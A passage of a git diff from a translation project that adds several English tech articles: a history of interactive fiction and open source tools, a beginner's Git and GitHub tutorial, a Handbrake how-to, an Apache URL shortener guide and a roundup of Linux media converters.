[4]:https://github.com/dylanaraps/neofetch
[5]:https://fedoramagazine.org/wp-content/uploads/2018/07/neofetch.png
[6]:https://remarkableapp.github.io/linux.html
[7]:https://fedoramagazine.org/wp-content/uploads/2018/07/remarkable.png
[8]:https://github.com/theZiz/aha
[9]:https://fedoramagazine.org/wp-content/uploads/2018/07/aha.png
[10]:https://copr.fedorainfracloud.org/coprs/scx/aha/
A brief history of text-based games and open source
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/compass_map_explore_adventure.jpg?itok=ecCoVTrZ)
The [Interactive Fiction Technology Foundation][1] (IFTF) is a non-profit organization dedicated to the preservation and improvement of technologies enabling the digital art form we call interactive fiction. When a Community Moderator for Opensource.com suggested an article about IFTF, the technologies and services it supports, and how it all intersects with open source, I found it a novel angle to the decades-long story I’ve so often told. The history of IF is longer than—but quite enmeshed with—the modern FOSS movement. I hope you’ll enjoy my sharing it here.
|
||||||
|
|
||||||
|
### Definitions and history
|
||||||
|
|
||||||
|
To me, the term interactive fiction includes any video game or digital artwork whose audience interacts with it primarily through text. The term originated in the 1980s when parser-driven text adventure games—epitomized in the United States by [Zork][2], [The Hitchhiker’s Guide to the Galaxy][3], and the rest of [Infocom][4]’s canon—defined home-computer entertainment. Its mainstream commercial viability had guttered by the 1990s, but online hobbyist communities carried on the tradition, releasing both games and game-creation tools.
|
||||||
|
|
||||||
|
After a quarter century, interactive fiction now comprises a broad and sparkling variety of work, from puzzle-laden text adventures to sprawling and introspective hypertexts. Regular online competitions and festivals provide a great place to peruse and play new work: The English-language IF world enjoys annual events including [Spring Thing][5] and [IFComp][6], the latter a centerpiece of modern IF since 1995—which also makes it the longest-lived continually running game showcase event of its kind in any genre. [IFComp’s crop of judged-and-ranked entries from 2017][7] shows the amazing diversity in form, style, and subject matter that text-based games boast today.
|
||||||
|
|
||||||
|
(I specify "English-language" above because IF communities tend to self-segregate by language, perhaps due to the technology's focus on writing. There are also annual IF events in [French][8] and [Italian][9], for example, and I've heard of at least one Chinese IF festival. Happily, these borders are porous; during the four years I managed IFComp, it has welcomed English-translated work from all international communities.)
|
||||||
|
|
||||||
|
![counterfeit monkey game screenshot][11]
|
||||||
|
|
||||||
|
Starting a new game of Emily Short's "Counterfeit Monkey," running on the interpreter Lectrote (both open source software).
|
||||||
|
|
||||||
|
Also due to its focus on text, IF presents some of the most accessible platforms for both play and authorship. Almost anyone who can read digital text—including users of assistive technology such as text-to-speech software—can play most IF works. Likewise, IF creation is open to all writers willing to learn and work with its tools and techniques.
|
||||||
|
|
||||||
|
This brings us to IF’s long relationship with open source, which has helped enable the art form’s availability since its commercial heyday. I'll provide an overview of contemporary open-source IF creation tools, and then discuss the ancient and sometimes curious tradition of IF works that share their source code.
|
||||||
|
|
||||||
|
### The world of open source IF tools
|
||||||
|
|
||||||
|
A number of development platforms, most of which are open source, are available to create traditional parser-driven IF in which the user types commands—for example, `go north,` `get lamp`, `pet the cat`, or `ask Zoe about quantum mechanics`—to interact with the game’s world. The early 1990s saw the emergence of several hacker-friendly parser-game development kits; those still in use today include [TADS][12], [Alan][13], and [Quest][14]—all open, with the latter two bearing FOSS licenses.
|
||||||
|
|
||||||
|
But by far the most prominent of these is [Inform][15], first released by Graham Nelson in 1993 and now maintained by a team Nelson still leads. Inform source is semi-open, in an unusual fashion: Inform 6, the previous major version, [makes its source available through the Artistic License][16]. This has more immediate relevance than may be obvious, since the otherwise proprietary Inform 7 holds Inform 6 at its core, translating its [remarkable natural-language syntax][17] into its predecessor’s more C-like code before letting it compile the work down into machine code.
|
||||||
|
|
||||||
|
![inform 7 IDE screenshot][19]
|
||||||
|
|
||||||
|
The Inform 7 IDE, loaded up with documentation and a sample project.
|
||||||
|
|
||||||
|
Inform games run on a virtual machine, a relic of the Infocom era when that publisher targeted a VM so that it could write a single game that would run on Apple II, Commodore 64, Atari 800, and other flavors of the "[home computer][20]." Fewer popular operating systems exist today, but Inform’s virtual machines—the relatively modern [Glulx][21] or the charmingly antique [Z-machine][22], a reverse-engineered clone of Infocom’s historical VM—let Inform-created work run on any computer with an Inform interpreter. Currently, popular cross-platform interpreters include desktop programs like [Lectrote][23] and [Gargoyle][24] or browser-based ones like [Quixe][25] and [Parchment][26]. All are open source.
|
||||||
|
|
||||||
|
If the pace of Inform’s development has slowed in its maturity, it remains vital through an active and transparent ecosystem—just like any other popular open source project. In Inform’s case, this includes the aforementioned interpreters, [a collection of language extensions][27] (usually written in a mix of Inform 6 and 7), and of course, all the work created with it and shared with the world, sometimes with source included (I’ll return to that topic later in this article).

IF creation tools invented in the 21st century tend to explore player interactions outside of the traditional parser, generating hypertext-driven work that any modern web browser can load. Chief among these is [Twine][28], originally developed by Chris Klimas in 2009 and under active development by many contributors today as [a GNU-licensed open source project][29]. (In fact, [Twine][30] can trace its OSS lineage back to [TiddlyWiki][31], the project from which Klimas initially derived it.)

Twine represents a sort of maximally [open and accessible approach][30] to IF development: Beyond its own FOSS nature, it renders its output as self-contained websites, relying not on machine code requiring further specialized interpretation but the open and well-exercised standards of HTML, CSS, and JavaScript. As a creative tool, Twine can match its own exposed complexity to the creator’s skill level. Users with little or no programming knowledge can create simple but playable IF work, while those with more coding and design skills—including those developing these skills by making Twine games—can develop more sophisticated projects. Little wonder that Twine’s visibility and popularity in educational contexts have grown quite a bit in recent years.

Other noteworthy open source IF development projects include the MIT-licensed [Undum][32] by Ian Millington, and [ChoiceScript][33] by Dan Fabulich and the [Choice of Games][34] team—both of which also target the web browser as the gameplay platform. Looking beyond strict development systems like these, web-based IF gives us a rich and ever-churning ecosystem of open source work, such as furkle’s [collection of Twine-extending tools][35] and Liza Daly’s [Windrift][36], a JavaScript framework purpose-built for her own IF games.

### Programs, games, and game-programs

Twine benefits from [a standing IFTF program dedicated to its support][37], allowing the public to help fund its maintenance and development. IFTF also directly supports two long-time public services, IFComp and the IF Archive, both of which depend upon and contribute back into open software and technologies.

![Harmonia opening screen shot][39]

The opening of Liza Daly's "Harmonia," created with the Windrift open source IF-creation framework.

The Perl- and JavaScript-based application that runs the IFComp’s website has been [a shared-source project][40] since 2014, and it reflects [the stew of FOSS licenses used by its IF-specific sub-components][41], including the various code libraries that allow parser-driven competition entries to run in a web browser. [The IF Archive][42]—online since 1992 and [an IFTF project since 2017][43]—is a set of mirrored repositories based entirely on ancient and stable internet standards, with [a little open source Python script][44] to handle indexing.

### At last, the fun part: Let's talk about open source text games

The bulk of the archive [comprises games][45], of course—years and years of games, reflecting decades of evolving game-design trends and IF tool development.

Lots of IF work shares its source code, and the community’s quick-start solution for finding it is simple: [Search the IFDB for the tag "source available"][46]. (The IFDB is yet another long-running IF community service, run privately by TADS creator Mike Roberts.) Users who are comfortable with a more bare-bones interface may also wish to browse [the `/games/source` directory][47] of the IF Archive, which groups content by development platform and written language (there’s also a lot of work either too miscellaneous or too ancient to categorize floating at the top).

A little bit of random sampling of these code-sharing games reveals an interesting dilemma: Unlike the wider world of open source software, the IF community lacks a generally agreed-upon way of licensing all the code that it generates. Unlike a software tool—including all the tools we use to build IF—an interactive fiction game is a work of art in the most literal sense, meaning that an open source license intended for software would fit it no better than it would any other work of prose or poetry. But then again, an IF game is also a piece of software, and it exhibits source-code patterns and techniques that its creator may legitimately wish to share with the world. What is an open source-aware IF creator to do?

Some games address this by passing their code into the public domain, either through explicit license or—as in the case of [the original 42-year-old Adventure by Crowther and Woods][48]—through community fiat. Some try to split the difference, rolling their own license that allows for free re-use of a game’s exposed business logic but prohibits the creation of work derived specifically from its prose. This is the tack I took when I opened up the source of my own game, [The Warbler’s Nest][49]. Lord knows how well that’d stand up in court, but I didn’t have any better ideas at the time.

Naturally, you can find work that simply puts everything under a single common license and never mind the naysayers. A prominent example is [Emily Short’s epic Counterfeit Monkey][50], released in its entirety under a Creative Commons 4.0 license. [CC frowns at its application to code][51], but you could argue that [the strangely prose-like nature of Inform 7 source][52] makes it at least a little more compatible with a CC license than a more traditional software project would be.

### What now, adventurer?

If you are eager to start exploring the world of interactive fiction, here are a few links to check out:

+ As mentioned above, IFDB and the IF Archive both present browsable interfaces to more than 40 years’ worth of collected interactive fiction work. Much of this is playable in a web browser, but some requires additional interpreter programs. IFDB can help you find and install these. IFComp’s annual results pages provide another view into the best of this free and archive-available work.
+ The Interactive Fiction Technology Foundation is a charitable non-profit organization that helps support Twine, IFComp, and the IF Archive, as well as improve the accessibility of IF, explore IF’s use in education, and more. Join its mailing list to receive IFTF’s monthly newsletter, peruse its blog, and browse some thematic merchandise.
+ John Paul Wohlscheid wrote this article about open-source IF tools earlier this year. It covers some platforms not mentioned here, so if you’re still hungry for more, have a look.

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/interactive-fiction-tools

作者:[Jason Mclntosh][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/jmac
[1]:http://iftechfoundation.org/
[2]:https://en.wikipedia.org/wiki/Zork
[3]:https://en.wikipedia.org/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(video_game)
[4]:https://en.wikipedia.org/wiki/Infocom
[5]:http://www.springthing.net/
[6]:http://ifcomp.org/
[7]:https://ifcomp.org/comp/2017
[8]:http://www.fiction-interactive.fr/
[9]:http://www.oldgamesitalia.net/content/marmellata-davventura-2018
[10]:/file/403396
[11]:https://opensource.com/sites/default/files/uploads/monkey.png (counterfeit monkey game screenshot)
[12]:http://tads.org/
[13]:https://www.alanif.se/
[14]:http://textadventures.co.uk/quest/
[15]:http://inform7.com/
[16]:https://github.com/DavidKinder/Inform6
[17]:http://inform7.com/learn/man/RB_4_1.html#e307
[18]:/file/403386
[19]:https://opensource.com/sites/default/files/uploads/inform.png (inform 7 IDE screenshot)
[20]:https://www.youtube.com/watch?v=bu55q_3YtOY
[21]:http://ifwiki.org/index.php/Glulx
[22]:http://ifwiki.org/index.php/Z-machine
[23]:https://github.com/erkyrath/lectrote
[24]:https://github.com/garglk/garglk/
[25]:http://eblong.com/zarf/glulx/quixe/
[26]:https://github.com/curiousdannii/parchment
[27]:https://github.com/i7/extensions
[28]:http://twinery.org/
[29]:https://github.com/klembot/twinejs
[30]:/article/18/7/twine-vs-renpy-interactive-fiction
[31]:https://tiddlywiki.com/
[32]:https://github.com/idmillington/undum
[33]:https://github.com/dfabulich/choicescript
[34]:https://www.choiceofgames.com/
[35]:https://github.com/furkle
[36]:https://github.com/lizadaly/windrift
[37]:http://iftechfoundation.org/committees/twine/
[38]:/file/403391
[39]:https://opensource.com/sites/default/files/uploads/harmonia.png (Harmonia opening screen shot)
[40]:https://github.com/iftechfoundation/ifcomp
[41]:https://github.com/iftechfoundation/ifcomp/blob/master/LICENSE.md
[42]:https://www.ifarchive.org/
[43]:http://blog.iftechfoundation.org/2017-06-30-iftf-is-adopting-the-if-archive.html
[44]:https://github.com/iftechfoundation/ifarchive-ifmap-py
[45]:https://www.ifarchive.org/indexes/if-archiveXgames
[46]:http://ifdb.tads.org/search?sortby=ratu&searchfor=%22source+available%22
[47]:https://www.ifarchive.org/indexes/if-archiveXgamesXsource.html
[48]:http://ifdb.tads.org/viewgame?id=fft6pu91j85y4acv
[49]:https://github.com/jmacdotorg/warblers-nest/
[50]:https://github.com/i7/counterfeit-monkey
[51]:https://creativecommons.org/faq/#can-i-apply-a-creative-commons-license-to-software
[52]:https://github.com/i7/counterfeit-monkey/blob/master/Counterfeit%20Monkey.materials/Extensions/Counterfeit%20Monkey/Liquids.i7x

193
sources/tech/20180720 An Introduction to Using Git.md
Normal file
@ -0,0 +1,193 @@

translating by distant1219

An Introduction to Using Git
======

![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/developer-3461405_1920.png?itok=6H3sYe80)

If you’re a developer, then you know your way around development tools. You’ve spent years studying one or more programming languages and have perfected your skills. You can develop with GUI tools or from the command line. On your own, nothing can stop you. You code as if your mind and your fingers are one, creating elegant, perfectly commented source for an app you know will take the world by storm.

But what happens when you’re tasked with collaborating on a project? Or what about when that app you’ve developed becomes bigger than just you? What’s the next step? If you want to successfully collaborate with other developers, you’ll want to make use of a distributed version control system. With such a system, collaborating on a project becomes incredibly efficient and reliable. One such system is [Git][1]. Along with Git comes a handy repository called [GitHub][2], where you can house your projects, such that a team can check out and check in code.

I will walk you through the very basics of getting Git up and running and using it with GitHub, so the development on your game-changing app can be taken to the next level. I’ll be demonstrating on Ubuntu 18.04, so if your distribution of choice is different, you’ll only need to modify the Git install commands to suit your distribution’s package manager.

### Git and GitHub

The first thing to do is create a free GitHub account. Head over to the [GitHub signup page][3] and fill out the necessary information. Once you’ve done that, you’re ready to move on to installing Git (you can actually do these two steps in any order).

Installing Git is simple. Open up a terminal window and issue the command:

```
sudo apt install git-all
```

This will include a rather large number of dependencies, but you’ll wind up with everything you need to work with Git and GitHub.

On a side note: I use Git quite a bit to download source for application installation. There are times when a piece of software isn’t available via the built-in package manager. Instead of downloading the source files from a third-party location, I’ll often go to the project’s Git page and clone the package like so:

```
git clone ADDRESS
```

Where ADDRESS is the URL given on the software’s Git page. Doing this almost always ensures I am installing the latest release of a package.

### Create a local repository and add a file

The next step is to create a local repository on your system (we’ll call it newproject and house it in ~/). Open up a terminal window and issue the commands:

```
cd ~/
mkdir newproject
cd newproject
```

Now we must initialize the repository. In the ~/newproject folder, issue the command git init. When the command completes, you should see that the empty Git repository has been created (Figure 1).

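The same steps can be run end to end in one snippet; this sketch sandboxes everything under a temporary directory so it will not touch an existing ~/newproject on your machine.

```shell
# Create and initialize the repository (sandboxed in a temp dir).
set -e
tmp=$(mktemp -d)
cd "$tmp"
mkdir newproject
cd newproject
git init
```

The last command prints a confirmation along the lines of "Initialized empty Git repository in .../newproject/.git/".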
![new repository][5]

Figure 1: Our new repository has been initialized.

[Used with permission][6]

Next we need to add a file to the project. From within the root folder (~/newproject) issue the command:

```
touch readme.txt
```

You will now have an empty file in your repository. Issue the command git status to verify that Git is aware of the new file (Figure 2).

![readme][8]

Figure 2: Git knows about our readme.txt file.

[Used with permission][6]

Even though Git is aware of the file, it hasn’t actually been added to the project. To do that, issue the command:

```
git add readme.txt
```

Once you’ve done that, issue the git status command again to see that readme.txt is now considered a new file in the project (Figure 3).

![file added][10]

Figure 3: Our file has now been added to the staging environment.

[Used with permission][6]

### Your first commit

With the new file in the staging environment, you are now ready to create your first commit. What is a commit? Easy: A commit is a record of the files you’ve changed within the project. Creating the commit is actually quite simple. It is important, however, that you include a descriptive message for the commit. By doing this, you are adding notes about what the commit contains (such as what changes you’ve made to the file). Before we do this, however, we have to inform Git who we are. To do this, issue the commands:

```
git config --global user.email EMAIL
git config --global user.name "FULL NAME"
```

Where EMAIL is your email address and FULL NAME is your name.

Now we can create the commit by issuing the command:

```
git commit -m "Descriptive Message"
```

Where Descriptive Message is your message about the changes within the commit. For example, since this is the first commit for the readme.txt file, the commit could be:

```
git commit -m "First draft of readme.txt file"
```

You should see output indicating that 1 file has changed and a new mode was created for readme.txt (Figure 4).

![success][12]

Figure 4: Our commit was successful.

[Used with permission][6]

### Create a branch and push it to GitHub

Branches are important, as they allow you to move between project states. Let’s say you want to create a new feature for your game-changing app. To do that, create a new branch. Once you’ve completed work on the feature you can merge this feature from the branch to the master branch. To create the new branch, issue the command:

```
git checkout -b BRANCH
```

where BRANCH is the name of the new branch. Once the command completes, issue the command git branch to see that it has been created (Figure 5).

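Here is the branch step as a runnable sandbox; the name featureX matches the article's example, and an initial commit is made first so the default branch appears in the `git branch` listing alongside the new one.

```shell
# Create a feature branch in a throwaway repo and confirm it exists.
set -e
tmp=$(mktemp -d)
cd "$tmp"
git init -q
git -c user.email=you@example.com -c user.name=You commit -q --allow-empty -m "initial"
git checkout -q -b featureX
git branch
```

The branch you are currently on is marked with an asterisk in the listing.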
![featureX][14]

Figure 5: Our new branch, called featureX.

[Used with permission][6]

Next we need to create a repository on GitHub. If you log into your GitHub account, click the New Repository button from your account main page. Fill out the necessary information and click Create repository (Figure 6).

![new repository][16]

Figure 6: Creating the new repository on GitHub.

[Used with permission][6]

After creating the repository, you will be presented with a URL to use for pushing our local repository. To do this, go back to the terminal window (still within ~/newproject) and issue the commands:

```
git remote add origin URL
git push -u origin master
```

Where URL is the URL of your new GitHub repository.

You will be prompted for your GitHub username and password. Once you successfully authenticate, the project will be pushed to your GitHub repository and you’re ready to go.

### Pulling the project

Say your collaborators make changes to the code on the GitHub project and have merged those changes. You will then need to pull the project files to your local machine, so the files you have on your system match those on the remote account. To do this, issue the command (from within ~/newproject):

```
git pull origin master
```

The above command will pull down any new or changed files to your local repository.

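You do not need GitHub to rehearse the push/pull cycle: any bare repository can play the role of the remote. The sketch below substitutes a local bare repo for the GitHub URL, pushes a first commit to it, and clones it back, which is exactly what a collaborator would do.

```shell
# Use a local bare repository as "origin", push to it, then clone it back.
set -e
remote=$(mktemp -d)/origin.git
work=$(mktemp -d)/newproject
dest=$(mktemp -d)
git init -q --bare "$remote"
git init -q "$work"
cd "$work"
git symbolic-ref HEAD refs/heads/master  # ensure the branch is named master
touch readme.txt
git add readme.txt
git -c user.email=you@example.com -c user.name=You commit -q -m "First draft of readme.txt file"
git remote add origin "$remote"
git push -q -u origin master
git clone -q "$remote" "$dest/newproject"
ls "$dest/newproject"
```

With a real GitHub remote, only the `git remote add origin URL` and `git push -u origin master` lines differ: the URL points at github.com and the push prompts for credentials.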
### The very basics

And that is the very basics of using Git from the command line to work with a project stored on GitHub. There is quite a bit more to learn, so I highly recommend you issue the commands man git, man git-push, and man git-pull to get a more in-depth understanding of what the git command can do.

Happy developing!

Learn more about Linux through the free ["Introduction to Linux"][17] course from The Linux Foundation and edX.

--------------------------------------------------------------------------------

via: https://www.linux.com/learn/intro-to-linux/2018/7/introduction-using-git

作者:[Jack Wallen][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.linux.com/users/jlwallen
[1]:https://git-scm.com/
[2]:https://github.com/
[3]:https://github.com/join?source=header-home
[4]:/files/images/git1jpg
[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_1.jpg?itok=FKkr5Mrk (new repository)
[6]:https://www.linux.com/licenses/category/used-permission
[7]:/files/images/git2jpg
[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_2.jpg?itok=54G9KBHS (readme)
[9]:/files/images/git3jpg
[10]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_3.jpg?itok=KAJwRJIB (file added)
[11]:/files/images/git4jpg
[12]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_4.jpg?itok=qR0ighDz (success)
[13]:/files/images/git5jpg
[14]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_5.jpg?itok=6m9RTWg6 (featureX)
[15]:/files/images/git6jpg
[16]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_6.jpg?itok=d2toRrUq (new repository)
[17]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux

57
sources/tech/20180720 Convert video using Handbrake.md
Normal file
@ -0,0 +1,57 @@

translating---geekpi

Convert video using Handbrake
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OpenVideo.png?itok=jec9ibU5)

Recently, when my son asked me to digitally convert some old DVDs of his high school basketball games, I immediately knew I would use [Handbrake][1]. It is an open source package that has all the tools necessary to easily convert video into formats that can be played on MacOS, Windows, Linux, iOS, Android, and other platforms.

Handbrake is open source and distributable under the [GPLv2 license][2]. It's easy to install on MacOS, Windows, and Linux, including both [Fedora][3] and [Ubuntu][4]. In Linux, once it's installed, it can be launched from the command line with `$ handbrake` or selected from the graphical user interface. (In my case, that is GNOME 3.)

![](https://opensource.com/sites/default/files/uploads/handbrake_1.png)

Handbrake's menu system is easy to use. Click on **Open Source** to select the video source you want to convert. For my son's basketball videos, that is the DVD drive in my Linux laptop. After inserting the DVD into the drive, the software identifies the contents of the disk.

![](https://opensource.com/sites/default/files/uploads/handbrake_2.png)

As you can see next to Source in the screenshot above, Handbrake recognizes it as a DVD with a 720x480 video in 4:3 aspect ratio, recorded at 29.97 frames per second, with one audio track. The software also previews the video.

If the default conversion settings are acceptable, just press the **Start Encoding** button and (after a period of time, depending on the speed of your processor) the DVD's contents will be converted and saved in the default format, [M4V][5] (which can be changed).

If you don't like the filename, it's easy to change it.

![](https://opensource.com/sites/default/files/uploads/handbrake_3.png)

Handbrake has a variety of output options for format, size, and disposition. For example, it can produce video optimized for YouTube, Vimeo, and other websites, as well as for devices including iPod, iPad, Apple TV, Amazon Fire TV, Roku, PlayStation, and more.

![](https://opensource.com/sites/default/files/uploads/handbrake_4.png)

You can change the video output size in the Dimensions menu tab. Other tabs allow you to apply filters, change video quality and encoding, add or modify an audio track, include subtitles, and modify chapters. The Tags menu tab lets you identify the author, actors, director, release date, and more on the output video file.

![](https://opensource.com/sites/default/files/uploads/handbrake_5.png)

If you want to set Handbrake to produce output for a specific platform, you can use the included presets.

![](https://opensource.com/sites/default/files/uploads/handbrake_6.png)

You can also use the menu options to create your own format, depending on the functionality you want.

Handbrake is an incredibly powerful piece of software, but it's not the only open source video conversion tool out there. Do you have another favorite? If so, please share in the comments.

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/handbrake

作者:[Don Watkins][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/don-watkins
[1]:https://handbrake.fr/
[2]:https://github.com/HandBrake/HandBrake/blob/master/LICENSE
[3]:https://fedora.pkgs.org/28/rpmfusion-free-x86_64/HandBrake-1.1.0-1.fc28.x86_64.rpm.html
[4]:https://launchpad.net/~stebbins/+archive/ubuntu/handbrake-releases
[5]:https://en.wikipedia.org/wiki/M4V

@ -0,0 +1,82 @@

How to build a URL shortener with Apache
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/openweb-osdc-lead.png?itok=yjU4KliG)

Long ago, folks started sharing links on Twitter. The 140-character limit meant that URLs might consume most (or all) of a tweet, so people turned to URL shorteners. Eventually, Twitter added a built-in URL shortener ([t.co][1]).

Character count isn't as important now, but there are still other reasons to shorten links. For one, the shortening service may provide analytics—you can see how popular the links are that you share. It also simplifies making easy-to-remember URLs. For example, [bit.ly/INtravel][2] is much easier to remember than <https://www.in.gov/ai/appfiles/dhs-countyMap/dhsCountyMap.html>. And URL shorteners can come in handy if you want to pre-share a link but don't know the final destination yet.

Like any technology, URL shorteners aren't all positive. By masking the ultimate destination, shortened links can be used to direct people to malicious or offensive content. But if you surf carefully, URL shorteners are a useful tool.

We [covered shorteners previously][3] on this site, but maybe you want to run something simple that's powered by a text file. In this article, we'll show how to use the Apache HTTP server's mod_rewrite feature to set up your own URL shortener. If you're not familiar with the Apache HTTP server, check out David Both's article on [installing and configuring][4] it.

### Create a VirtualHost

In this tutorial, I'm assuming you bought a cool domain that you'll use exclusively for the URL shortener. For example, my website is [funnelfiasco.com][5], so I bought [funnelfias.co][6] to use for my URL shortener (okay, it's not exactly short, but it feeds my vanity). If you won't run the shortener as a separate domain, skip to the next section.

The first step is to set up the VirtualHost that will be used for the URL shortener. For more information on VirtualHosts, see [David Both's article][7]. This setup requires just a few basic lines:

```
<VirtualHost *:80>
    ServerName funnelfias.co
</VirtualHost>
```

### Create the rewrites

This service uses HTTPD's rewrite engine to rewrite the URLs. If you created a VirtualHost in the section above, the configuration below goes into your VirtualHost section. Otherwise, it goes in the VirtualHost or main HTTPD configuration for your server.

```
RewriteEngine on
RewriteMap shortlinks txt:/data/web/shortlink/links.txt
RewriteRule ^/(.+)$ ${shortlinks:$1} [R=temp,L]
```

The first line simply enables the rewrite engine. The second line builds a map of the short links from a text file. The path above is only an example; you will need to use a valid path on your system (make sure it's readable by the user account that runs HTTPD). The last line rewrites the URL. In this example, it takes any characters and looks them up in the rewrite map. You may want to have your rewrites use a particular string at the beginning. For example, if you wanted all your shortened links to be of the form "slX" (where X is a number), you would replace `(.+)` above with `(sl\d+)`.

I used a temporary (HTTP 302) redirect here. This allows me to update the destination URL later. If you want the short link to always point to the same target, you can use a permanent (HTTP 301) redirect instead. Replace `temp` on line three with `permanent`.

### Build your map

Edit the file you specified on the `RewriteMap` line of the configuration. The format is a space-separated key-value store. Put one link on each line:

```
osdc https://opensource.com/users/bcotton
twitter https://twitter.com/funnelfiasco
swody1 https://www.spc.noaa.gov/products/outlook/day1otlk.html
```

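Before pointing Apache at the file, you can sanity-check the lookups offline: what a `txt:` RewriteMap does is essentially a first-column key search. A rough stand-in using awk (file contents copied from the example above):

```shell
# Recreate the map file and emulate a RewriteMap lookup for the key "osdc".
cat > links.txt <<'EOF'
osdc https://opensource.com/users/bcotton
twitter https://twitter.com/funnelfiasco
swody1 https://www.spc.noaa.gov/products/outlook/day1otlk.html
EOF
awk -v key="osdc" '$1 == key { print $2 }' links.txt
```

A missing key prints nothing here, which corresponds to the rewrite producing an empty target for unknown short links.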
### Restart HTTPD

The last step is to restart the HTTPD process. This is done with `systemctl restart httpd` or similar (the command and daemon name may differ by distribution). Your link shortener is now up and running. When you're ready to edit your map, you don't need to restart the web server. All you have to do is save the file, and the web server will pick up the differences.

### Future work

This example gives you a basic URL shortener. It can serve as a good starting point if you want to develop your own management interface as a learning project. Or you can just use it to share memorable links to forgettable URLs.

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/apache-url-shortener

作者:[Ben Cotton][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/bcotton
[1]:http://t.co
[2]:http://bit.ly/INtravel
[3]:https://opensource.com/article/17/3/url-link-shortener
[4]:https://opensource.com/article/18/2/how-configure-apache-web-server
[5]:http://funnelfiasco.com
[6]:http://funnelfias.co
[7]:https://opensource.com/article/18/3/configuring-multiple-web-sites-apache

@ -0,0 +1,71 @@

4 open source media conversion tools for the Linux desktop
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_newmedia.png?itok=imgehG2v)

Ah, so many file formats—especially audio and video ones—can make for fun times if you get a file with an extension you don't recognize, if your media player doesn't play a file in that format, or if you want to use an open format.

So, what can a Linux user do? Turn to one of the many open source media conversion tools for the Linux desktop, of course. Let's take a look at four of them.

### Gnac

![](https://opensource.com/sites/default/files/uploads/gnac.png)

[Gnac][1] is one of my favorite audio converters and has been for years. It's easy to use, it's powerful, and it does one thing well—as any top-notch utility should.

How easy? You click a toolbar button to add one or more files to convert, choose a format to convert to, and then click **Convert**. The conversions are quick, and they're clean.

How powerful? Gnac can handle all the audio formats that the [GStreamer][2] multimedia framework supports. Out of the box, you can convert between Ogg, FLAC, AAC, MP3, WAV, and SPX. You can also change the conversion options for each format or add new ones.

### SoundConverter

![](https://opensource.com/sites/default/files/uploads/soundconverter.png)

If simplicity with a few extra features is your thing, then give [SoundConverter][3] a look. As its name states, SoundConverter works its magic only on audio files. Like Gnac, it can read the formats that GStreamer supports, and it can spit out Ogg Vorbis, MP3, FLAC, WAV, AAC, and Opus files.

Load individual files or an entire folder by either clicking **Add File** or dragging and dropping it into the SoundConverter window. Click **Convert**, and the software powers through the conversion. It's fast, too—I've converted a folder containing a couple dozen files in about a minute.

SoundConverter has options for setting the quality of your converted files. You can change the way files are named (for example, include a track number or album name in the title) and create subfolders for the converted files.

### WinFF

![](https://opensource.com/sites/default/files/uploads/winff.png)

[WinFF][4], on its own, isn't a converter. It's a graphical frontend to FFmpeg, which [Tim Nugent looked at][5] for Opensource.com. While WinFF doesn't have all the flexibility of FFmpeg, it makes FFmpeg easier to use and gets the job done quickly and fairly easily.

Although it's not the prettiest application out there, WinFF doesn't need to be. It's more than usable. You can choose what formats to convert to from a dropdown list and select several presets. On top of that, you can specify options like bitrates and frame rates, the number of audio channels to use, and even the size at which to crop videos.

The conversions, especially video, take a bit of time, but the results are generally quite good. Once in a while, the conversion gets a bit mangled—but not often enough to be a concern. And, as I said earlier, using WinFF can save me a bit of time.

### Miro Video Converter
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/miro-main-window.png)
|
||||||
|
|
||||||
|
Not all video files are created equally. Some are in proprietary formats. Others look great on a monitor or TV screen but aren't optimized for a mobile device. That's where [Miro Video Converter][6] comes to the rescue.
|
||||||
|
|
||||||
|
Miro Video Converter has a heavy emphasis on mobile. It can convert video that you can play on Android phones, Apple devices, the PlayStation Portable, and the Kindle Fire. It will convert most common video formats to MP4, [WebM][7] , and [Ogg Theora][8] . You can find a full list of supported devices and formats [on Miro's website][6]
|
||||||
|
|
||||||
|
To use it, either drag and drop a file into the window or select the file that you want to convert. Then, click the Format menu to choose the format for the conversion. You can also click the Apple, Android, or Other menus to choose a device for which you want to convert the file. Miro Video Converter resizes the video for the device's screen resolution.
|
||||||
|
|
||||||
|
Do you have a favorite Linux media conversion application? Feel free to share it by leaving a comment.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/media-conversion-tools-linux
|
||||||
|
|
||||||
|
作者:[Scott Nesbitt][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
